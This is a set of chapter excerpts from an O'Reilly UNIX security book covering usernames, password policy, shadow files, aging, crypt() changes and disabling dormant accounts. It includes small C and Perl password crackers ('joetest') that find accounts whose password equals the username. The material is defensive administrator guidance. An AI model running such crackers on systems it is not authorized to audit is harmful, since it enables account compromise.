Your username identifies you to <strong>UNIX</strong> the same way your first name identifies you to your friends.<br />

When you log into the <strong>UNIX</strong> system, you tell it your username the same way you might say, "Hello, this<br />

is Sabrina," when you pick up the telephone.[2] When somebody sends you electronic mail, they send it<br />

addressed with your username. For this reason, organizations that have more than one computer often<br />

require people to have the same username on every machine, primarily to minimize confusion with<br />

electronic mail.<br />

[2] Even if you aren't Sabrina, saying that you are Sabrina identifies you as Sabrina. Of<br />

course, if you are not Sabrina, your voice will probably not authenticate you as Sabrina,<br />

provided that the person you are speaking with knows what Sabrina sounds like.<br />

There is considerable flexibility in choosing a username. For example, John Q. Random might have any<br />

of the following usernames; they are all potentially valid:<br />

john johnqr johnr jqr jqrandom jrandom random randomjq<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_01.htm (2 of 3) [2002-04-12 10:44:28]


[Chapter 3] Users and Passwords<br />

Alternatively, John might have a username that appears totally unrelated to his real name, like avocado<br />

or t42. Having a username similar to your own name is merely a matter of convenience.<br />

Most organizations require that usernames be at least three characters long. Usernames that are only one<br />

or two characters are valid, but they are usually discouraged. Single-character usernames are simply too<br />

confusing for most people to deal with, no matter how easy you might think it would be to be user "i" or<br />

"x". Usernames that are two characters long are easily confused between different sites: is<br />

mg@unipress.com the same person as mg@aol.com? Names with little intrinsic meaning, such as t42<br />

and xp9uu6wl, can also cause confusion, because they are more difficult for correspondents to remember.<br />

Some organizations assign usernames consisting of a person's last name (sometimes with an optional<br />

initial). Other organizations let users pick their own names. A few organizations and online services<br />

assign an apparently random string of characters as the usernames, although this is not often popular with<br />

users or their correspondents: user xp9uu6wl may get quite annoyed at continually getting mail<br />

misaddressed for xp9uu6wi, assuming that anyone can remember either username at all.<br />

<strong>UNIX</strong> also has special accounts which are used for administrative purposes and special system functions.<br />

These accounts are not normally used by individual users, as you will see shortly.<br />

II. User Responsibilities 3.2 Passwords<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_01.htm (3 of 3) [2002-04-12 10:44:28]


[Chapter 8] 8.8 Administrative Techniques for Conventional Passwords<br />

Chapter 8<br />

Defending Your Accounts<br />

8.8 Administrative Techniques for Conventional Passwords<br />

If you're a system administrator and you are stuck using conventional <strong>UNIX</strong> passwords, then you will find this section helpful. It<br />

describes a number of techniques that you can use to limit the danger of conventional passwords on your computer.<br />

8.8.1 Assigning Passwords to Users<br />

Getting users to pick good passwords can be very difficult. You can tell users horror stories and you can threaten them, but some<br />

users will always pick easy-to-guess passwords. Because a single user with a bad password can compromise the security of the<br />

entire system, some <strong>UNIX</strong> administrators assign passwords to users directly rather than letting users choose their own.<br />

To prevent users from changing their own passwords, all that you have to do is to change the permissions on the /bin/passwd<br />

program that changes people's passwords.[14] Making the program executable only by people in the staff group, for example, will<br />

still allow staff members to change their own passwords, but will prevent other people from doing so:<br />

[14] This technique requires changing permissions on any other password-changing software, such as yppasswd and<br />

nispasswd.<br />

# chgrp staff /bin/passwd<br />

# chmod 4750 /bin/passwd<br />

Use this approach only if staff members are available 24 hours a day. Otherwise, if a user discovers that someone has been using<br />

her account, or if she accidentally discloses her password, the user is powerless to safeguard the account until she has contacted<br />

someone on staff.<br />

Some versions of <strong>UNIX</strong> may have an administrator command that will allow you to prevent selected users from changing their<br />

passwords.[15] Thus, you do not need to change the permissions on the passwd program. You only need to disable the capability<br />

for those users who cannot be trusted to set good passwords on their own.<br />

[15] On AIX, the root user can prevent ordinary users from changing their passwords by running the following:<br />

pwdadm -f ADMIN user or by editing /etc/security/passwd.<br />

For example, in SVR4 <strong>UNIX</strong>, you can prevent a user from changing her password by setting the aging parameters appropriately<br />

(we discuss password aging in a few more pages). For example, to prevent Kevin from changing his password, you might use the<br />

command:<br />

# passwd -n 60 -x 50 kevin<br />

Note, however, that Kevin's password will expire in 50 days and will need to be reset by someone with superuser access.<br />

8.8.2 Constraining Passwords<br />

You can easily strengthen the passwd program to disallow users from picking easy-to-guess passwords - such as those based on<br />

the user's own name, other accounts on the system, or on a word in the <strong>UNIX</strong> dictionary. So far, however, many <strong>UNIX</strong> vendors<br />

have not made the necessary modifications to their software. There are some freeware packages available on the net, including<br />

npasswd and passwd+, which can be used for this purpose; both are available at popular FTP archives, including<br />

coast.cs.purdue.edu. Another popular system is anlpasswd, which has some advantages over npasswd and passwd+, and can be<br />

found at info.mcs.anl.gov.<br />

Some versions of <strong>UNIX</strong>, most notably the Linux operating system, come supplied with npasswd. Other vendors would do well to<br />

follow this example.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_08.htm (1 of 9) [2002-04-12 10:44:29]


[Chapter 8] 8.8 Administrative Techniques for Conventional Passwords<br />

An approach that is present in many versions of <strong>UNIX</strong> involves putting constraints on the passwords that users can select.<br />

Normally, this approach is controlled by some parameters accessed through the system administration interface. These settings<br />

allow the administrator to set the minimum password length, the number of nonalphabetic characters allowed, and so on. You<br />

might even be able to specify these settings per user, as well as per system.<br />

One <strong>UNIX</strong> system that combines all these features in addition to password aging is AIX. By editing the security profile via the<br />

smit management tool, the administrator can set any or all of the following for all users or individually for each user (IBM's<br />

recommended settings are given for each):<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

The minimum and maximum age of passwords, in weeks (0, 12)<br />

The number of days of warning to give before expiring a password (14)<br />

The minimum length of the new password (6)<br />

The minimum number of alphabetic and non-alphabetic characters that must be present in the new password (1, 1)<br />

The maximum number of repeated characters allowed in the new password (3)<br />

The minimum number of characters that must be different from those in the previous password (3)<br />

The number of weeks before a password can be used again (26)<br />

The number of new passwords that must be selected and used before an old password can be used again (8)<br />

The name of a file of prohibited words that cannot be selected as passwords<br />

A list of programs that can be run to check the password choice for acceptability<br />

This list is the most comprehensive group of "settable" password constraints that we have seen. If you are using traditional<br />

passwords, having (and properly using!) options such as these can significantly improve the security of your passwords.<br />

8.8.3 Cracking Your Own Passwords<br />

A less drastic approach than preventing users from picking their own passwords is to run a program periodically to scan the<br />

/etc/passwd file for users with passwords that are easy to guess. Such programs, called password crackers, are (unfortunately?)<br />

identical to the programs that bad guys use to break into systems. The best of these crackers is a program called Crack. (We tell<br />

you in Appendix E, where to get it.) If you don't (or can't) use shadow password files, you definitely want to get and use the Crack<br />

program on your password file...because one of your users or an attacker will most certainly do so.<br />

NOTE: Before you run a password cracker on your system, be sure that you are authorized to do so. You may wish<br />

to get the authorization in writing. Running a password cracker may give the impression that you are attempting to<br />

break into a particular computer. Unless you have proof that you were authorized to run the program, you may find<br />

yourself facing unpleasant administrative actions or possibly even prosecution for computer crime.<br />

8.8.3.1 Joetest: a simple password cracker<br />

To understand how a password-cracking program works, consider this program, which simply scans for accounts that have the<br />

same password as their username. From Chapter 3, remember that such accounts are known as "Joes." The program must be run as<br />

root if you have shadow password files installed on your system:<br />

Example 8.1: Single Password Cracker<br />

/*<br />

* joetest.c:<br />

*<br />

* Scan for "joe" accounts -- accounts with the same username<br />

*and password.<br />

*/<br />

#include <br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_08.htm (2 of 9) [2002-04-12 10:44:29]


#include <br />

int main(int argc,char **argv)<br />

{<br />

struct passwd *pw;<br />

}<br />

[Chapter 8] 8.8 Administrative Techniques for Conventional Passwords<br />

while(pw=getpwent() ){<br />

char *crypt();<br />

char *result;<br />

result = crypt(pw->pw_name,pw->pw_passwd);<br />

if(!strcmp(result,pw->pw_passwd)){<br />

printf("%s is a joe\n",pw->pw_name);<br />

}<br />

}<br />

exit(0);<br />

To show you the advantages of the Perl programming language, we have rewritten this program:<br />

#!/usr/local/bin/perl<br />

#<br />

# joetest<br />

#<br />

while (($name,$passwd) = getpwent) {<br />

print "$name is a joe\n" if (crypt($name,$passwd) eq $passwd);<br />

}<br />

To further demonstrate the power of Perl, consider the following script, which only runs under Perl5:<br />

#!/usr/local/bin/perl<br />

#<br />

# super joetest<br />

#<br />

while (($name,$passwd) = getpwent) {<br />

print "$name has no password\n" if !$passwd;<br />

print "$name is a joe\n" if (crypt($name,$passwd) eq $passwd);<br />

print "$name is a JOE\n" if (crypt(uc($name), $passwd) eq $passwd);<br />

print "$name is a Joe\n" if (crypt(ucfirst($name), $passwd)<br />

eq $passwd);<br />

print "$name is a eoj\n" if (crypt(scalar reverse $name, $passwd)<br />

eq $passwd);<br />

}<br />

If you have the time, type in the above program and run it. You might be surprised to find a Joe or two on your system. Or simply<br />

get Crack, which will scan for these possibilities, and a whole lot more.<br />

8.8.3.2 The dilemma of password crackers<br />

Because password crackers are used both by legitimate system administrators and computer criminals, they present an interesting<br />

problem: if you run the program, a criminal might find its results and use them to break into your system! And, if the program<br />

you're running is particularly efficient, it may be stolen and used against you. Furthermore, the program you're using could always<br />

have more bugs or have been modified so that it doesn't report some bad passwords that may be present: instead, such passwords<br />

might be silently sent by electronic mail to an anonymous repository in Finland.<br />

Instead of running a password cracker, you should prevent users from picking bad passwords in the first place. Nevertheless, this<br />

goal is not always reachable. For this reason, many system administrators run password crackers on a regular basis. If you run a<br />

program like Crack and find a bad password, you should disable the account immediately, because an attacker could also find it.<br />

NOTE: If you run a password cracker and don't find any weak passwords, you shouldn't assume that there are none<br />

to find! You might not have as extensive a set of dictionaries as the people working against you: while your program<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_08.htm (3 of 9) [2002-04-12 10:44:29]


[Chapter 8] 8.8 Administrative Techniques for Conventional Passwords<br />

reports no weak passwords found, outsiders might still be busy logging in using cracked passwords found with their<br />

Inuit, Basque, and Middle Druid dictionaries. Or an attacker may have booby-trapped your copy of Crack, so that<br />

discovered passwords are not reported but are sent to a computer in New Zealand for archiving. For these reasons,<br />

use password cracking in conjunction with user education, rather than as an alternative to it.<br />

8.8.4 Password Generators<br />

Under many newer versions of <strong>UNIX</strong>, you can prevent users from choosing their own passwords altogether. Instead, the passwd<br />

program runs a password generator that produces pronounceable passwords. To force users to use the password generator under<br />

some versions of System V <strong>UNIX</strong>, you select the "Accounts Defaults Passwords" menu from within the sysadmsh<br />

administrative program.<br />

Most users don't like passwords that are generated by password generators: despite claims of the program's authors, the passwords<br />

really aren't that easy to remember. Besides, most users would much rather pick a password that is personally significant to them.<br />

Unfortunately, these passwords are also the ones that are easiest to guess.<br />

Two more problems with generated passwords are that users frequently write them down to remember them, and that the<br />

password generator programs themselves can be maliciously modified to generate "known" passwords.<br />

There are several freely available password generators that you can download and install on your system. The mkpasswd program<br />

by Don Libes is one such program, and it can be found in most of the online archives mentioned in Appendix E.<br />

Instead of using password generators, you may want to install password "advisors" - programs that examine user choices for<br />

passwords and inform the users if the passwords are weak. There are commercial programs that do this procedure, such as<br />

password coach by Baseline Software, and various freeware and shareware filters such as passwd+. In general, these products may<br />

do comparisons against dictionaries and heuristics to determine if the candidate password is weak. However, note that these<br />

products suffer from the same set of drawbacks as password crackers - they can be modified to secretly record the passwords, and<br />

their knowledge base may be smaller than that used by potential adversaries. If you use an "advisor," don't be complacent!<br />

8.8.5 Shadow Password Files<br />

When the <strong>UNIX</strong> password system was devised, the simple security provided by the salt was enough. Computers were slow (by<br />

present standards), and hard disks were small. At the rate of one password encryption per second, the system would have taken<br />

three years and three months to encrypt the entire 25,000-word <strong>UNIX</strong> spelling dictionary with every one of the 4096 different<br />

salts. Simply holding the database would require more than 10 gigabytes of storage - well beyond the capacity of typical <strong>UNIX</strong><br />

platforms.<br />

The advantage to a computer criminal of such a database, however, would be immense. Such a database would reduce the time to<br />

do an exhaustive key search for a password from seven hours to a few seconds. Finding accounts on a computer that had weak<br />

passwords would suddenly become a simple matter.<br />

Today, many of the original assumptions about the difficulty of encrypting passwords have broken down. For starters, the time<br />

necessary to calculate an encrypted password has shrunk dramatically. Modern workstations can perform up to several thousand<br />

password encryptions per second. Versions of crypt developed for supercomputers can encrypt tens of thousands of passwords in<br />

the same amount of time. Now you can even store a database of every word in the <strong>UNIX</strong> spelling dictionary encrypted with every<br />

possible salt on a single 10 gigabyte hard disk drive, or on a few high-density CD-ROMs.<br />

Because of these developments, placing even encrypted passwords in the world-readable /etc/passwd file is no longer secure.[16]<br />

There is still no danger that an attacker can decrypt the passwords actually stored - the danger is simply that an attacker could<br />

copy your password file and then systematically search it for weak passwords. As a result, numerous vendors have introduced<br />

shadow password files.[17] <strong>UNIX</strong> systems that offer at least so-called C2-level security features have shadow password files, or<br />

the capability to install them.<br />

[16] The /etc/passwd file must be world readable, because many, many programs need to consult it for UID to<br />

account name mappings, home directories, and username information. Changing the permissions breaks quite a few<br />

essential and convenient services.<br />

[17] Shadow password files have been a standard part of AT&T <strong>UNIX</strong> since the introduction of SVR4. A number of<br />

add-on shadow password systems are available for other versions of <strong>UNIX</strong>; installing them requires having the<br />

source code to your <strong>UNIX</strong> system.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_08.htm (4 of 9) [2002-04-12 10:44:29]


[Chapter 8] 8.8 Administrative Techniques for Conventional Passwords<br />

Shadow password files hold the same encrypted passwords as the regular <strong>UNIX</strong> password file: they simply prevent users from<br />

reading each other's encrypted passwords. Shadow files are protected so that they cannot be read by regular users; they can be<br />

read, however, by the setuid programs that legitimately need access. (For instance, SVR4 uses the file /etc/shadow, with protected<br />

mode 400, and owned by root; SunOS uses the file /etc/security/passwd.adjunct, where /etc/security is mode 700.) The regular<br />

/etc/passwd file has special placeholders in the password field instead of the regular encrypted values. Some systems substitute a<br />

special flag value, while others have random character strings that look like regular encrypted passwords: would-be crackers can<br />

then burn a lot of CPU cycles trying dictionary attacks on random strings.<br />

If your system does not have shadow passwords, then you should take extra precautions to ensure that the /etc/passwd file cannot<br />

be read anonymously, either over the network or with the UUCP system. (How to do this is described in Chapter 15, UUCP, and<br />

Chapter 17.)<br />

If you use shadow password files, you should be sure that there are no backup copies of the shadow password file that are publicly<br />

readable elsewhere on your system. Copies of passwd are sometimes left (often in /tmp or /usr/tmp) as editor backup files and by<br />

programs that install new system software. A good way to avoid leaving copies of your password files on your system is to avoid<br />

editing them with a text editor, or to exercise special care when doing so.<br />

8.8.6 Password Aging and Expiration<br />

Some <strong>UNIX</strong> systems allow the system administrator to set a "lifetime" for passwords.[18] With these systems, users whose<br />

passwords are older than the time allowed are forced to change their passwords the next time they log in. If a user's password is<br />

exceptionally old, the system may prevent the user from logging in altogether.<br />

[18] Different systems use different procedures for password aging. For a description of how to set password<br />

lifetimes on your system, consult your system documentation.<br />

Password aging can improve security. Even if a password is learned by an attacker and the account is surreptitiously used, that<br />

password will eventually be changed. Password aging can also help you discover when people have access to passwords and<br />

accounts that aren't properly registered. In one case we know about, when a computer center started password aging, four users<br />

suddenly discovered that they were all using the same account - without each other's knowledge! The account's password had<br />

simply not been changed for years, and the users had all been working in different subdirectories.<br />

Users sometimes defeat password aging systems by changing an expired password to a new password and then back to the old<br />

password. A few password aging systems check for this type of abuse by keeping track of old and invalid passwords. Others<br />

prevent it by setting a minimum lifetime on the new password. Thus, if the password is changed, the user is forced to use it for at<br />

least a week or two before it can be changed again - presumably back to the old standby.[19] If you use password aging, you<br />

should explain to your users why it is important for them to avoid reusing old passwords.<br />

[19] This is a bad idea, even though it is common on many SVR4 systems. It prevents the user from changing a<br />

password if it has been compromised, and it will not prevent a user from cycling between two favorite passwords<br />

again and again.<br />

Under SVR4, you can set password aging using the -n (minimum days before the password can be change) and -x (maximum<br />

number of days) options (e.g., passwd -n 7 -x 42 sally). Setting the aging value to -1 disables aging.<br />

Old-Style Password Aging<br />

Older versions of <strong>UNIX</strong> had a form of password aging available, but it was usually not documented well, if it was documented at<br />

all. We describe it here for the sake of completeness.<br />

To enable the old-style password aging, you would append a comma and two base-64 digits to the end of the password field in the<br />

/etc/passwd file for each user. The comma was not valid as part of an encoded password, and signalled that password aging was to<br />

be enabled for that user. The two digits encoded the aging parameters that are now set with the -x and -n options of the SVR4<br />

passwd command, as described previously. The base-64 encoding is the same as that used for encoding passwords, and is<br />

described in the section called <strong>Sec</strong>tion 8.6.1, "The crypt() Algorithm."<br />

The first digit after the comma represented the number of weeks until the password expired (from the beginning of the current<br />

week). The second digit represented the minimum number of weeks that the password had to be kept before it could be changed<br />

again. These values would be calculated by the system administrator and then edited into the appropriate locations in the passwd<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_08.htm (5 of 9) [2002-04-12 10:44:29]


[Chapter 8] 8.8 Administrative Techniques for Conventional Passwords<br />

file. After being set, the user would be prompted to choose a new password the next time he or she logged in. Then two more<br />

digits would be appended to the field in the file; these two digits would also be updated each time the passwd command was run<br />

successfully. These two digits encoded, in base-64, the time of the most recent password change, expressed as a number of weeks<br />

since the beginning of 1970. These digits were usually expressed in reverse order, as if base-64 wasn't obscure enough!<br />

Putting simply a ",." at the end of a password field would require the password to be changed at the very next login. Most systems<br />

would then remove these characters, although we have heard tell that on some dimly remembered system, the characters would get<br />

changed into ",.z" (allow changes anytime, expire this one in 64 weeks).<br />

Few systems were shipped with software to ease the task of calculating and setting these values manually. As another drawback,<br />

the users were given no warning before a password expired - the user logged in and was forced to change the password right then<br />

and there. Everyone we know who experienced the mechanism hated it and we do not believe it was widely used. The SVR4<br />

mechanism is a great improvement, although still not ideal.<br />

NOTE: Do not use the -n option with the password aging command! Configuring your system so that users are<br />

prevented from changing their password is stupid. Users can accidently disclose their passwords to others - for<br />

example, they might say their new password out loud when they are typing it in for the first time. If users are required<br />

to wait a minimum time before changing their passwords again, then their accounts will be vulnerable.<br />

Password aging should not be taken to extremes. Forcing users to change their passwords more often than once every few months<br />

is probably not helpful. If users change their passwords so often that they find it difficult to remember what their current<br />

passwords are, they'll probably write these passwords down. Imagine a system that requires users to change their passwords every<br />

day. Expiration times that are too short may make the security worse, rather than better. Furthermore, it engenders discontent -<br />

feelings that the security mechanisms are annoying rather than reasonable. You may have good passwords, but having users who<br />

are constantly angry about the security measures in place probably negates any benefits gained.<br />

On the other hand, if you want your users to change their passwords every minute, or every time that they log in, then you<br />

probably want to be using a one-time password system, such as those described in <strong>Sec</strong>tion 8.7.1, "Integrating One-time Passwords<br />

with <strong>UNIX</strong>earlier in this chapter.<br />

8.8.7 Algorithm and Library Changes<br />

If you have the source code to your system, you can alter the crypt() library function to dramatically improve the resistance of<br />

your computer to password cracking. Here are some techniques you might employ:<br />

1.<br />

2.<br />

Change the number of encryption rounds from 25 to something over 200. This change will make the encryption routine<br />

operate more slowly, which is good. More importantly, it will make encrypted passwords generated on your computer<br />

different from passwords generated on other systems. This foils an attacker who obtains a copy of your /etc/passwd file and<br />

tries to crack it on a remote computer using standard software.<br />

Add a counter to the crypt() library call that keeps track of how many times it has been called within a single process. If a<br />

user's program calls it more than 5 or 10 times, log that fact with syslog, being sure to report the user's login name, tty and<br />

other pertinent information. Then start returning the wrong values![20]<br />

[20] Many sites feel uncomfortable with this advice to modify a system library to return wrong values.<br />

However, in our experience, few (if any) programs need to run crypt() more than a few times in a single<br />

process unless those processes are attempting to crack passwords. On the other hand, when we have worked<br />

with sites that have had problems with password cracking, those problems have stopped immediately when the<br />

crypt() routine was modified to behave in this manner. If you feel uncomfortable having some programs<br />

silently fail, you may wish to end their silence, and have them send email to the system administrator or log a<br />

syslogmessage when the crypt() routine is run more than a few times.<br />

If you decide to implement this approach, there are some issues to be aware of:<br />

1.<br />

2.<br />

3.<br />

If your system uses shared libraries, be sure to update the crypt() in the shared library; otherwise, some commands may not<br />

work properly.<br />

If your system does not use shared libraries, be sure to update the crypt() function in your file libc.a, so that people who<br />

write programs that use crypt() will get the modified version.<br />

Be sure to re-link every program that uses crypt() so that they all get the new version of the routine. On most <strong>UNIX</strong><br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_08.htm (6 of 9) [2002-04-12 10:44:29]


[Chapter 8] 8.8 Administrative Techniques for Conventional Passwords<br />

systems, that means generating new versions of (at least) the following programs:<br />

/bin/login /usr/sbin/in.rexecd<br />

/bin/su /usr/sbin/in.rlogind<br />

/bin/passwd /usr/sbin/in.rshd<br />

/usr/sbin/in.ftpd<br />

1.<br />

Some programs legitimately need to call the crypt() routine more than 10 times in a single process. For example, the server<br />

of a multiuser game program, which uses passwords to protect user characters, would need to call crypt() if it stored the<br />

passwords in an encrypted form (another good idea). For programs like these, you will need to provide a means for them to<br />

run with a version of the crypt() function that allows the function to be run an unlimited number of times.<br />

Do these techniques work? Absolutely. A few years ago, there was a computer at MIT on which guest accounts were routinely<br />

given away to members of the local community. Every now and then, somebody would use one of those guest accounts to grab a<br />

copy of the password file, crack it, and then trash other people's files. (This system didn't have shadow passwords either.) The day<br />

after the above modifications were installed in the system's crypt() library, the break-ins stopped and the system's administrators<br />

were able to figure out who was the source of the mischief. Eventually, though, the system administrators gave up on<br />

modifications and went back to the standard crypt() function. That's because changing your crypt() has some serious drawbacks:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

The passwords in your /etc/passwd file will no longer be compatible with an unaltered system,[21] and you won't be able to<br />

trade /etc/passwd entries with other computers.<br />

[21] This may be an advantage under certain circumstances. Being unable to trade encrypted passwords means<br />

being unable to have "bad" passwords on a computer that were generated on another machine. This is<br />

especially an issue if you modify your passwd program to reject bad passwords. On a recent sweep of<br />

numerous computers at AT&T, one set of machines was found to have uncrackable passwords, except for the<br />

passwords of two accounts that had been copied from other machines.<br />

If your site transfers /etc/passwd entries between machines as ways of transferring accounts, then you will need to have the<br />

same crypt() modifications on each machine.<br />

If you use NIS or NIS+, then you must use the same crypt() algorithm on all of the <strong>UNIX</strong> machines on your network.<br />

You'll need to install your changes every time the software is updated, and if you cease to have access to the source, all of<br />

your users will have to set new passwords to access the system.<br />

This method depends on attackers not knowing the exact number of rounds used in the encryption. If they discover that<br />

you're using 26 rounds instead of 25, for example, they can modify their own password-breaking software and attack your<br />

system as before. (However, this scenario is unlikely to happen in most environments; the cracker is more likely to try to<br />

break into another computer - hardly a drawback at all!)<br />

If an insider knows both his cleartext password and the encrypted version, he can also determine experimentally how the<br />

algorithm was changed.<br />

NOTE: While increasing the number of rounds that the encryption algorithm performs is a relatively safe operation,<br />

don't alter the algorithm used in the actual password mechanism unless you are very, very confident that you know<br />

what you are doing. It is very easy to make a change you think is adding complexity, only to make things much<br />

simpler for an attacker who understands the algorithm better than you do.<br />

8.8.8 Disabling an Account by Changing Its Password<br />

If a user is going away for a few weeks or longer, you may wish to prevent direct logins to that user's account so the account won't<br />

be used by someone else.<br />

As mentioned earlier, one easy way to prevent logins is to insert an asterisk (*) before the first character of the user's password in<br />

the /etc/passwd file or shadow password file.[22] The asterisk will prevent the user from logging in, because the user's password<br />

will no longer encrypt to match the password stored in /etc/passwd, and the user won't know what's wrong. To re-enable the<br />

account with the same password, simply remove the asterisk.<br />

[22] This method of changing a user's password is not sufficient if the user has a .rhosts file or can rlogin from a<br />

computer in your computer's /etc/hosts.equiv file. It also will not stop the execution of programs run by the cron or at<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_08.htm (7 of 9) [2002-04-12 10:44:29]


[Chapter 8] 8.8 Administrative Techniques for Conventional Passwords<br />

commands.<br />

For example, here is the /etc/passwd entry for a regular account:<br />

omega:eH5/.mj7NB3dx:315:1966:Omega Agemo:/u/omega:/bin/csh<br />

Here is the same account, with direct logins prevented:<br />

omega:*eH5/.mj7NB3dx:315:1966:Omega Agemo:/u/omega:/bin/csh<br />

Under SVR4, you can accomplish the same thing by using the -l option to the passwd command, (e.g., passwd -l omega).<br />

You should be sure to check for at and cron jobs that are run by the user whose account you are disabling.<br />

Note that the superuser can still su to the account. The section <strong>Sec</strong>tion 8.5, "Protecting the root Account explains the details of<br />

protecting accounts in a variety of other ways. Briefly, we'd also suggest that you set the login shell equal to /bin/false, or to some<br />

program that logs attempts to use it. You should also consider changing the permissions on the user's home directory to mode 000<br />

and changing the ownership to user root.<br />

As the administrator, you may also want to set expiration and inactivity time-outs on accounts. This step means that accounts<br />

cease to be valid after a certain date unless renewed, or they cease to be usable unless a valid login occurs every so often. This last<br />

case is especially important in environments where you have a dynamic user population (as in a university) and it is difficult to<br />

monitor all of the accounts. We discussed this in greater detail earlier in this chapter.<br />

8.8.9 Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

As we described earlier in this chapter, you can give accounts almost any name you want. The choice of account names will<br />

usually be guided by a mixture of administrative convenience and user preference. You might prefer to call the accounts<br />

something mnemonic, so that users will be able to remember other usernames for electronic mail and other communications. This<br />

method is especially useful if you give your users access to Usenet and they intend to post news. A properly chosen username,<br />

such as paula, is more likely remembered by correspondents than is AC00045.<br />

At the same time, you can achieve slightly better security by having nonobvious usernames. This method is a form of security<br />

through obscurity. If an attacker does not know a valid username at your site, she will have greater difficulty breaking in. If your<br />

users' account names are not known outside your site and are nonobvious, potential intruders have to guess the account names as<br />

well as the password. This strategy adds some additional complexity to the task of breaking in, especially if some of your users<br />

have weak passwords.<br />

If you use obscure account names, you need a way to protect those account names from outsiders while still allowing your users to<br />

access electronic mail and participate in Usenet discussions. The way to do this is with aliasing.<br />

If you configure one machine to be your central mail and news site, you can set your software to change all outgoing mail and<br />

news to contain an alias instead of the real account name. This is probably what you wish to do if you decide to install a firewall<br />

between your site and the outside network (see Chapter 21, Firewalls).<br />

For example, your mailer could rewrite the From: line of outgoing messages to change a line that looks like this:<br />

From: paula@home.acs.com<br />

to look like this:<br />

From: Paula.Harris@ACS.COM<br />

This address is also the electronic mail address Paula would put on her business cards and correspondence. Incoming mail to those<br />

addresses would go through some form of alias resolution and be delivered to her account. You would also make similar<br />

configuration changes to the Usenet software. There is an additional advantage to aliasing - if an outsider knows the names of his<br />

correspondents but not their account names (or machine names), he can still get mail to them.<br />

If you take this approach, other network services, such as finger and who, must similarly be modified or disabled.[23]<br />

[23] Discussing all of the various mailers and news agents that are available and how to modify them to provide<br />

aliasing is beyond the scope of this book. We suggest that you consult the <strong>O'Reilly</strong> & Associates books on electronic<br />

mail and news to get this information.<br />

Many large organizations use some form of aliasing. For example, mail to people at AT&T Bell Laboratories that's addressed to<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_08.htm (8 of 9) [2002-04-12 10:44:29]


[Chapter 8] 8.8 Administrative Techniques for Conventional Passwords<br />

First.Last@att.com will usually be delivered to the right person.<br />

8.7 One-Time Passwords 9. Integrity Management<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_08.htm (9 of 9) [2002-04-12 10:44:29]


[Chapter 8] 8.4 Managing Dormant Accounts<br />

Chapter 8<br />

Defending Your Accounts<br />

8.4 Managing Dormant Accounts<br />

If a user is going to be gone for an extended period of time, you may wish to consider preventing direct logins to the user's account<br />

until his or her return. This assures that an intruder won't use the person's account in his or her absence. You may also wish to disable<br />

accounts that are seldom used, enabling them only as needed.<br />

There are three simple ways to prevent logins to an account:<br />

1.<br />

2.<br />

3.<br />

Change the account's password.<br />

Modify the account's password so it can't be used.<br />

Change the account's login shell.<br />

Actually, you may want to consider doing all three.<br />

8.4.1 Changing an Account's Password<br />

You can prevent logins to a user's account by changing his password to something he doesn't know. Remember, you must be the<br />

superuser to change another user's password.<br />

For example, you can change mary's password simply by typing the following:<br />

# passwd mary<br />

New password: dis1296<br />

Retype new password: dis1296<br />

Because you are the superuser, you won't be prompted for the user's old password.<br />

This approach causes the operating system to forget the user's old password and install the new one. Presumably, when the proper<br />

user of the account finds herself unable to log in, she will contact you and arrange to have the password changed to something else.<br />

Alternatively, you can prevent logins to an account by inserting an asterisk in the password field of the user's account. For example,<br />

consider a sample /etc/passwd entry for mary:<br />

mary:fdfdi3k1j1234:105:100:Mary Sue Lewis:/u/mary:/bin/csh<br />

To prevent logins to Mary's account, change the password field to look like this:<br />

mary:*fdfdi3k1j1234:105:100:Mary Sue Lewis:/u/mary:/bin/csh<br />

Mary won't be able to use her account until you remove the asterisk. When you remove it, she will have her original password back.<br />

We describe this in greater detail later in "Disabling an Account by Changing its Password."<br />

If you use shadow passwords on your system, be sure you are editing the password file that contains them, and not /etc/passwd. You<br />

can tell that you are using shadow passwords if the password field in /etc/passwd is blank or contains an asterisk or hash marks for<br />

every password, instead of containing regular encrypted passwords.<br />

Some <strong>UNIX</strong> versions require that you use a special command to edit the password file. This command ensures that two people are<br />

not editing the file at the same time, and also rebuilds system databases if necessary. On Berkeley-derived systems, the command is<br />

called vipw.<br />

Under System V-derived versions of <strong>UNIX</strong>, you can accomplish the same thing as adding an asterisk by using the -l option to the<br />

passwd command:<br />

# passwd -l mary<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_04.htm (1 of 4) [2002-04-12 10:44:30]


[Chapter 8] 8.4 Managing Dormant Accounts<br />

NOTE: Note that if you use the asterisk in the password file to disable the account, it could still be used with su, or from<br />

a remote login using the trusted hosts mechanism (~/.rhosts file or /etc/hosts.equiv). (For more information, see Chapter<br />

17, TCP/IP Services). Thus, changing the password is not sufficient to block access to an account on such a system.<br />

8.4.2 Changing the Account's Login Shell<br />

Another way to prevent direct logins to an account is to change the account's login shell so that instead of letting the user type<br />

commands, the system simply prints an informative message and exits. This change effectively disables the account. For example,<br />

you might change the line in /etc/passwd for the mary account from this:<br />

